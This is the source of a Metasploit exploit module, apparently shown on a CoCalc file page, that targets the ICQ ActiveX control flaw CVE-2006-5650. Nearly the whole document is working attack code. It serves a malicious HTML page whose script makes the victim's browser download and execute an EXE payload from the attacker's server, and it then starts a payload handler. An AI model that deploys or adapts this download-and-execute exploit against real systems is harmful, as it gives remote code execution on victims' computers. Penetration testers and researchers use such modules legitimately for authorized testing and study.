CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10
  include Msf::Exploit::EXE
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'America Online ICQ ActiveX Control Arbitrary File Download and Execute',
15
      'Description'    => %q{
16
          This module allows remote attackers to download and execute arbitrary files
17
        on a users system via the DownloadAgent function of the ICQPhone.SipxPhoneManager ActiveX control.
18
      },
19
      'License'        => MSF_LICENSE,
20
      'Author'         => [ 'MC' ],
21
      'References'     =>
22
        [
23
          [ 'CVE', '2006-5650' ],
24
          [ 'OSVDB', '30220' ],
25
          [ 'BID', '20930'  ],
26
          [ 'ZDI', '06-037' ],
27
        ],
28
      'Payload'        =>
29
        {
30
          'Space'           => 2048,
31
          'StackAdjustment' => -3500,
32
        },
33
      'Platform'       => 'win',
34
      'Targets'        =>
35
        [
36
          [ 'Automatic', { } ],
37
        ],
38
      'DisclosureDate' => '2006-11-06',
39
      'DefaultTarget'  => 0))
40

41
    register_options(
42
      [
43
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ])
44
      ])
45
  end
46

47
  def autofilter
48
    false
49
  end
50

51
  def check_dependencies
52
    use_zlib
53
  end
54

55
  def on_request_uri(cli, request)
56

57
    payload_url =  "http://"
58
    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
59
    payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/PAYLOAD"
60

61
    if (request.uri.match(/PAYLOAD/))
62
      return if ((p = regenerate_payload(cli)) == nil)
63
      data = generate_payload_exe({ :code => p.encoded })
64
      print_status("Sending EXE payload")
65
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
66
      return
67
    end
68

69
    vname  = rand_text_alpha(rand(100) + 1)
70
    exe    = rand_text_alpha_upper(rand(5) + 1)
71

72
    content = %Q|
73
  <html>
74
    <head>
75
      <script>
76
        try {
77
          var #{vname} = new ActiveXObject('ICQPhone.SipxPhoneManager.1');
78
          #{vname}.DownloadAgent("#{payload_url}/#{exe}.exe");
79
        } catch( e ) { window.location = 'about:blank' ; }
80
      </script>
81
    </head>
82
  </html>
83
        |
84

85
    print_status("Sending exploit...")
86

87
    send_response_html(cli, content)
88

89
    handler(cli)
90

91
  end
92
end
93

94